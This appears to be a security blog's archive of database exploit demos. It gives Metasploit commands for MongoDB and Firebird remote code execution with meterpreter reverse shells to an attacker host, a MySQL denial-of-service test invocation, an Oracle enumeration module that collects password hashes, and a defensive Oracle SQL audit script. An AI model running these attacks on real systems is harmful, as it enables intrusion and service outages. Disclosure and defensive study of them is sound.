Tag Archives: Database

CVE-2013-1892 MongoDB nativeHelper.apply Remote Code Execution Metasploit Demo

Timeline :

Vulnerability discovered and reported to vendor by agix around 2013-03-01
Vulnerability publicly disclosed by agix the 2013-03-24
Metasploit PoC provided the 2013-03-27

PoC provided by :

agix

Reference(s) :

CVE-2013-1892
OSVDB-91632
BID-58695

Affected version(s) :

MongoDB 2.2.3 and previous

Tested on Ubuntu 10.04 x86 with :

MongoDB 2.2.3

Description :

This module exploits the nativeHelper feature of SpiderMonkey, which allows execution to be controlled by calling it with specially crafted arguments. This module has been tested successfully on MongoDB 2.2.3 on Ubuntu 10.04 and Debian Squeeze.

Commands :

use exploit/linux/misc/mongod_native_helper
set RHOST 192.168.178.53
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

sysinfo
getuid

CVE-2013-2492 Firebird Relational Database Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered by Spencer McIntyre the 2013-01-31
Vulnerability reported to the vendor the 2013-03-05
Coordinate public release of the vulnerability the 2013-03-08
Metasploit PoC provided the 2013-03-08

PoC provided by :

Spencer McIntyre

Reference(s) :

CVE-2013-2492
CORE-4058

Affected version(s) :

Firebird versions 2.1.3-2.1.5 and 2.5.1-2.5.2

Tested on Windows XP Pro SP3 with :

FireBird 2.5.2.26539

Description :

This module exploits a vulnerability in Firebird SQL Server. A specially crafted packet can be sent which overwrites a pointer, allowing the attacker to control where data is read from. Shortly after the controlled read, the pointer is called, resulting in code execution. The vulnerability exists in the handling of a group number extracted from the CNCT information sent by the client, whose size is not properly checked. This module uses an existing call to memcpy, just prior to the vulnerable code, which allows a small amount of data to be written to the stack. A two-phase stack pivot then allows execution of the ROP chain, which is ultimately used to call VirtualAlloc and bypass DEP.

Commands :

use exploit/windows/misc/fb_cnct_group
set RHOST 192.168.178.22
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

getuid
sysinfo

Oracle MySQL InnoDB Bugs 13510739 and 63775 DoS Demo

Timeline :

Public release of the vulnerabilities the 2012-03-21
Details of the vulnerability published by Oracle the 2012-04-10
PoC provided by Oracle the 2012-03-21 in the source code of 5.5.22 and 5.1.62

PoC provided by :

Oracle

Reference(s) :

SA48744
MySQL 5.5.22 release note
MySQL 5.1.62 release note
Eric Romang Pastebin

Affected version(s) :

MySQL Server 5.5.21 and previous versions
MySQL Server 5.1.61 and previous versions

Tested on Centos 5 with :

MySQL 5.5.21

Description :

Oracle released, on 21 March, two new versions of MySQL, 5.5.22 and 5.1.62. These versions fix two bugs, #13510739 and #63775, which are considered security fixes. But no impact details of these bugs are provided, and the bug reports are closed.
Unfortunately for Oracle, the two new versions were shipped with a development script, “mysql-test/suite/innodb/t/innodb_bug13510739.test”, intended to test the fix for the vulnerabilities: in effect, a PoC provided by Oracle. The bugs cause a denial of service of MySQL “ON HANDLER READ NEXT AFTER DELETE RECORD“. All the details are available in the script or at the Pastebin link above.

Commands :

mysql -u root -p database < innodb_bug13510739.test

Metasploit Oracle database enumeration (oraenum)

Metasploit provides one more useful Oracle database auxiliary module, which lets you gather information about the target database.

You can find all these auxiliary modules through the Metasploit search command.

To invoke this auxiliary module just type the following command :

This module will scan the Oracle database server to gather the following information :

  • Oracle version (select * from v$version)
  • All values from v$parameter (select name,value from v$parameter)
  • If database audit trail is enabled or not
  • If database sys operations audit is enabled or not
  • If SQL92 security restriction on SELECT is enabled or not
  • If link encryption for logins is enabled or not
  • Provide you the UTL directory access configuration
  • Provide you the audit log directory configuration
  • Provide you the current account lockout time from the password policy
  • Provide you the number of authorized failed logins value before an account is locked from the password policy
  • Provide you the password grace time value from the password policy
  • Provide you the password lifetime value from the password policy
  • Provide you the number of times a password can be reused from the password policy
  • Provide you the maximum number of times a password needs to be changed before it can be reused from the password policy
  • Check if the password complexity is enabled or not
  • Provide you a list of all active accounts in format Username, Hash and Spare4
  • Provide you a list of all expired or locked accounts in format Username, Hash and Spare4
  • Provide you a list of all accounts with DBA privileges in format Username and Hash
  • Provide you a list of all accounts with ALTER, JAVA ADMIN, CREATE LIBRARY, CREATE ANY.
  • Check whether default passwords are set up on the database.
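The same settings the module enumerates can be reviewed from the DBA side as a self-audit, which is the practical way to verify the hardening state before an auditor or an attacker does. The following SQL*Plus script is an added example, not the oraenum module's own code; it assumes a DBA connection and Oracle 11g or later (DBA_USERS_WITH_DEFPWD first appeared in 11g), and it deliberately does not select password hashes. Link encryption lives in sqlnet.ora rather than in the data dictionary and is not covered here.

```sql
-- Oracle security-configuration self-audit (added example, not the oraenum module).
-- Run as a DBA with sqlplus; assumes Oracle 11g+ for DBA_USERS_WITH_DEFPWD.
SET LINESIZE 200 PAGESIZE 100

-- Database version
SELECT banner FROM v$version;

-- Auditing and access-control instance parameters
SELECT name, value
  FROM v$parameter
 WHERE name IN ('audit_trail',                  -- NONE means statement auditing is off
                'audit_sys_operations',         -- TRUE audits SYSDBA/SYSOPER actions
                'sql92_security',               -- TRUE requires SELECT privilege in UPDATE/DELETE predicates
                'utl_file_dir',                 -- OS directory access for UTL_FILE; should be empty
                'audit_file_dest',              -- where OS audit files are written
                'remote_os_authent',            -- should be FALSE
                'o7_dictionary_accessibility'); -- should be FALSE

-- Password policy per profile (DEFAULT is what most accounts inherit);
-- a NULL PASSWORD_VERIFY_FUNCTION means no complexity check is enforced
SELECT profile, resource_name, limit
  FROM dba_profiles
 WHERE resource_type = 'PASSWORD'
   AND resource_name IN ('FAILED_LOGIN_ATTEMPTS', 'PASSWORD_LOCK_TIME',
                         'PASSWORD_GRACE_TIME',   'PASSWORD_LIFE_TIME',
                         'PASSWORD_REUSE_MAX',    'PASSWORD_REUSE_TIME',
                         'PASSWORD_VERIFY_FUNCTION')
 ORDER BY profile, resource_name;

-- Open versus expired/locked accounts, without touching the hashes
SELECT username, account_status, profile
  FROM dba_users
 ORDER BY account_status, username;

-- Accounts holding the DBA or JAVA_ADMIN roles
SELECT grantee, granted_role
  FROM dba_role_privs
 WHERE granted_role IN ('DBA', 'JAVA_ADMIN')
 ORDER BY granted_role, grantee;

-- Accounts holding high-risk system privileges
SELECT grantee, privilege
  FROM dba_sys_privs
 WHERE privilege IN ('ALTER ANY PROCEDURE', 'CREATE LIBRARY', 'CREATE ANY LIBRARY',
                     'CREATE ANY PROCEDURE', 'EXECUTE ANY PROCEDURE')
 ORDER BY grantee, privilege;

-- Accounts still using Oracle-supplied default passwords
SELECT username FROM dba_users_with_defpwd ORDER BY username;
```

Any row returned by the last query, any open account in the DEFAULT profile with UNLIMITED password limits, or an audit_trail of NONE is a finding that this module would report to an attacker just as readily.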